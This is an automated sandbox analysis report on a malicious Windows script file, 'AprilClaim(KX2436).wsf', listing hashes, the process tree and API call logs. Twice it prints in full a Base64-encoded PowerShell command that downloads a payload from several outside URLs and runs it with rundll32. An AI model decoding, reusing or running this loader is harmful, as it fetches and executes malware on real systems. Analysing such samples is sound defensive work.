Summary | ZeroBOX

AprilClaim(KX2436).wsf

Generic Malware Antivirus AntiVM AntiDebug
Category Machine Started Completed
FILE s1_win7_x6402 April 6, 2023, 9:32 a.m. April 6, 2023, 9:35 a.m.
Size 237.3KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 dfad90af79f42416cc6da9e312ec4f83
SHA256 e9559ab209aeddbb520110377bf0fef262e1b7fb18d879774e3efc186eaebc4f
CRC32 B9BBA224
ssdeep 6144:TtAAlXHYRkaxeSpTSf16w1TZoabBjdhWfX0/dD6dJmkQms1oamV:aiZETu16SPVTWIkJe1oamV
Yara
  • Generic_Malware_Zero - Generic Malware

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\AprilClaim(KX2436).wsf

    3060
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAcABpAHQAaABlAGMAYQBuAHQAaAByAG8AcAB1AHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBrAG0AcABoAGkALgBjAG8AbQAvAEYAVwBvAHYAbQBCAC8ANgBBAHMASwB4ADIALABoAHQAdABwAHMAOgAvAC8AYwBoAGkAbQBwAGMAaQB0AHkALgBjAG8AbQAvAGgANwBlAC8ASwBHAEQAWABDAFIAZgBaAG4ANwAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBsAHEAawAxAGoAcwBEAEkAMgA3AGIALABoAHQAdABwAHMAOgAvAC8AYwBlAG4AdABlAHIAawBpAGMAawAuAGMAbwBtAC8ASQBDADUARQBRADgALwBSAHgAcQB4AG0ARwB0ACwAaAB0AHQAcABzADoALwAvAHAAcgBvAHAAZQByAHQAeQBuAGUAYQByAC4AYwBvAC4AdQBrAC8AUQB5AFkAVwB5AHAALwBKAGIAeQBLAGsARQBEAGUALABoAHQAdABwADoALwAvAHIAbwBzAGUAdwBvAG8AZABsAGEAbQBpAG4AYQB0AGUAcwAuAGMAbwBtAC8AaABlAGEALwBkADAATgB2ADAAeABsADcARAAyACwAaAB0AHQAcABzADoALwAvAGcAcgBhAGYAaQBjAGEAbABlAHYAaQAuAGMAbwBtAC4AYgByAC8AMABwADYAUAAvAFgAdABSAEUAUAA5AGYATABvAHEALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBKAGUAYwAyAHkALABoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvADAAbgBhAHoAbABPAHUAYgB3ADYAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAQwBhAGMAbwBnAGUAbgBpAGMAcwBDAGwAaQBlAG4AdAByAHkAIABpAG4AIAAkAHAAaQB0AGgAZQBjAGEAbgB0AGgAcgBvAHAAdQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABDAGEAYwBvAGcAZQBuAGkAYwBzAEMAbABpAGUAbgB0AHIAeQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANwAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAHAAYQByAHIAZQBsAC4ARgBvAHIAZQBzAHAAZQBlAGMAaAAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="

      2224

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253a88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002537c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002537c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002537c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002533c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002533c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002533c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002533c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002533c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002533c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00252ec8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00252ec8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00252ec8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002539c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002539c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002539c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253588
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002539c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002539c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002539c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002539c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002539c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002539c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002539c8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00253888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00252f88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00252f88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00252f88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00252f88
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 1179648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027c0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0220a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02202000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02212000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02213000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02214000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0268b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02687000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0220b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02232000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02685000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02215000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02216000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0268c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02233000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02234000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02235000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02236000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02237000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02238000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02239000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05000000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05001000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05002000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05003000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05004000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05005000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05006000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05007000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05008000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05009000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0500f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05010000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05011000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05012000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05013000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2224
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05014000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline powershell -ENC "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAcABpAHQAaABlAGMAYQBuAHQAaAByAG8AcAB1AHMAIAA9ACAAKAAiAGgAdAB0AHAAcwA6AC8ALwBrAG0AcABoAGkALgBjAG8AbQAvAEYAVwBvAHYAbQBCAC8ANgBBAHMASwB4ADIALABoAHQAdABwAHMAOgAvAC8AYwBoAGkAbQBwAGMAaQB0AHkALgBjAG8AbQAvAGgANwBlAC8ASwBHAEQAWABDAFIAZgBaAG4ANwAsAGgAdAB0AHAAcwA6AC8ALwBjAGEAcABpAHQAYQBsAHAAZQByAHUAcgByAGgAaAAuAGMAbwBtAC8AdgBRADEAaQBRAGcALwBsAHEAawAxAGoAcwBEAEkAMgA3AGIALABoAHQAdABwAHMAOgAvAC8AYwBlAG4AdABlAHIAawBpAGMAawAuAGMAbwBtAC8ASQBDADUARQBRADgALwBSAHgAcQB4AG0ARwB0ACwAaAB0AHQAcABzADoALwAvAHAAcgBvAHAAZQByAHQAeQBuAGUAYQByAC4AYwBvAC4AdQBrAC8AUQB5AFkAVwB5AHAALwBKAGIAeQBLAGsARQBEAGUALABoAHQAdABwADoALwAvAHIAbwBzAGUAdwBvAG8AZABsAGEAbQBpAG4AYQB0AGUAcwAuAGMAbwBtAC8AaABlAGEALwBkADAATgB2ADAAeABsADcARAAyACwAaAB0AHQAcABzADoALwAvAGcAcgBhAGYAaQBjAGEAbABlAHYAaQAuAGMAbwBtAC4AYgByAC8AMABwADYAUAAvAFgAdABSAEUAUAA5AGYATABvAHEALABoAHQAdABwAHMAOgAvAC8AYQBnAHQAZQBuAGQAZQBsAHAAZQByAHUALgBjAG8AbQAvAEYAUAB1ADAARgBhAC8AeQBKAGUAYwAyAHkALABoAHQAdABwAHMAOgAvAC8AdABoAGUAcwBoAGkAcgB0AHMAdQBtAG0AaQB0AC4AYwBvAG0ALwBNAHcAQgBHAFMAbQAvADAAbgBhAHoAbABPAHUAYgB3ADYAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAQwBhAGMAbwBnAGUAbgBpAGMAcwBDAGwAaQBlAG4AdAByAHkAIABpAG4AIAAkAHAAaQB0AGgAZQBjAGEAbgB0AGgAcgBvAHAAdQBzACkAIAB7AHQAcgB5ACAAewB3AGcAZQB0ACAAJABDAGEAYwBvAGcAZQBuAGkAYwBzAEMAbABpAGUAbgB0AHIAeQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANwAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcABhAHIAcgBlAGwALgBGAG8AcgBlAHMAcABlAGUAYwBoACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAAMQAwADAAMAAwADAAKQAgAHsAcwB0AGEAcgB0ACAAcgB1AG4AZABsAGwAMwAyACAAJABlAG4AdgA6AFQARQBNAFAAXABcAHAAYQByAHIAZQBsAC4ARgBvAHIAZQBzAHAAZQBlAGMAaAAsAFgANQA1ADUAOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="
